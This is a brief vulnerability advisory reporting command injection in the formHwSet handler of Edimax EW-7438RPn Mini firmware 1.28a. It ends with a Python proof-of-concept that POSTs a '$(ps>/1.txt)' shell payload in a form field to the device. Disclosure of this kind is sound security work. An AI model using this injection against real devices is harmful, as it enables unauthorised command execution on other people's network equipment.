Overview

• The device's official website: https://www.edimax.com/edimax/download/download/data/edimax/global/download/product/wi-fi_range_extenders/wi-fi_range_extenders_n300/ew-7438rpn_mini/

Affected version

EW-7438RPn Mini Firmware 1.28a (Version : 1.28a)

Vulnerability details

The EDIMAX EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) firmware has a command injection vulnerability in the formHwSet function. The function receives the Anntena/Mcs/regDomain/nic0Addr/nic1Addr/wlanAddr/wanAddr/wlanSSID/wlanChan/comd/initgain/txcck/txofdm parameter from a POST request. However, since the user can control the input of these parameters, the statement system() can cause a command injection.

POC

import requests

ip = "192.168.153.2"

payload = "$(ps>/1.txt)"
data = {"Anntena": payload}

url = f'http://{ip}/goform/formHwSet'

res = requests.post(url=url, data=data, verify=False)
print(res)